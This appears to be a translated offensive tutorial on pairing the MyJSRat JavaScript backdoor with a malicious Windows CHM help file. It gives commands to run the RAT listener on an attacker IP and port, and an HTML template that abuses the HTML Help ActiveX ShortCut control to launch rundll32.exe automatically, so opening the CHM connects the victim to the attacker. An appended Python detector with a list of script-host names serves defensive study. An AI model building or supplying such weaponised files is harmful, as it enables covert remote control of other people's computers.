Title: MyJSRat combined with CHM command execution

MyJSRat combined with CHM command execution

MyJSRat

MyJSRat is the Python version of JSBackdoor.

Download: https://github.com/Ridter/MyJSRat

Easy CHM

CHM stands for "Compiled Help Manual", that is, a compiled help file. It is Microsoft's new-generation help file format: it uses HTML as its source text and compiles and stores the help content in a database-like form.

Steps

Download MyJSRat and run it

git clone https://github.com/Ridter/MyJSRat

python MyJSRat.py -i IPaddr -p port

Download the wtf file

Open https://IPaddr:port/wtf in a browser and save the response to a txt file.

Write the code saved above into the value of Item1 in the following code

Note: a comma (,) must be added before and after rundll32.exe.

<!DOCTYPE html>
<html><head><title>Mousejack replay</title></head><body>
command exec
<OBJECT id=x classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' width=1 height=1>
<PARAM name='Command' value='ShortCut'>
<PARAM name='Button' value='Bitmap:shortcut'>
<PARAM name='Item1' value=',rundll32.exe,'>
<PARAM name='Item2' value='273,1,1'>
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

Save as an HTML file

Create a new directory and save the above code in the new folder

Build the CHM file with EasyCHM

Compile the exp.html file with EasyCHM.

Double-click to bring the session online

At this point, just double-click the test.CHM file and the session comes online.
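For defenders, the template in this post leaves a stable signature in a CHM's HTML topics: the HTML Help ActiveX classid, a Command of ShortCut, an Item1 that names a script or binary host, and a script that clicks the control on load. The Python check below is an added example, not part of the original post or of MyJSRat; it assumes the topics have already been extracted from the CHM, and the host watch list, function names and both sample documents are constructed for illustration.

```python
import re
from html.parser import HTMLParser
# ClassID of the HTML Help ActiveX control, as it appears in the post's template.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed watch list of script/binary hosts; extend it for your environment.
HOSTS = re.compile(r"\b(rundll32|mshta|powershell|cmd|wscript|cscript|regsvr32)\b", re.I)

class _ShortcutFinder(HTMLParser):
    """Collects the PARAM values of every OBJECT embedding the HTML Help control."""
    def __init__(self):
        super().__init__()
        self.params = None   # PARAMs of the OBJECT currently open, if it is relevant
        self.objects = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: v or "" for k, v in attrs}
        if tag == "object" and HHCTRL_CLSID in attrs.get("classid", "").lower():
            self.params = {}
            self.objects.append(self.params)
        elif tag == "param" and self.params is not None:
            self.params[attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self.params = None

def scan_html(text):
    """Return one finding per HTML Help control whose Command is ShortCut."""
    finder = _ShortcutFinder()
    finder.feed(text)
    finder.close()
    auto_click = bool(re.search(r"\.click\s*\(", text, re.I))  # fired without user action
    findings = []
    for p in finder.objects:
        if p.get("command", "").strip().lower() != "shortcut":
            continue  # e.g. "Related Topics" is ordinary help navigation
        host = HOSTS.search(p.get("item1", ""))
        findings.append({"item1": p.get("item1", ""), "auto_click": auto_click,
                         "host": host.group(1).lower() if host else None})
    return findings

# Constructed samples; the Item1 arguments are a placeholder, not a real command.
SUSPICIOUS = """<html><body><OBJECT id=x classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' width=1 height=1>
<PARAM name='Command' value='ShortCut'><PARAM name='Item1' value=',rundll32.exe,PLACEHOLDER_ARGS'>
<PARAM name='Item2' value='273,1,1'></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>"""
BENIGN = """<html><body><OBJECT id=rel classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics"><PARAM name="Item1" value="Intro;intro.htm"></OBJECT></body></html>"""

if __name__ == "__main__":
    print(scan_html(SUSPICIOUS), scan_html(BENIGN))
```

A finding with both a host match and auto_click set is the pattern this post builds; on endpoints the matching runtime signal is hh.exe spawning one of the listed hosts.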
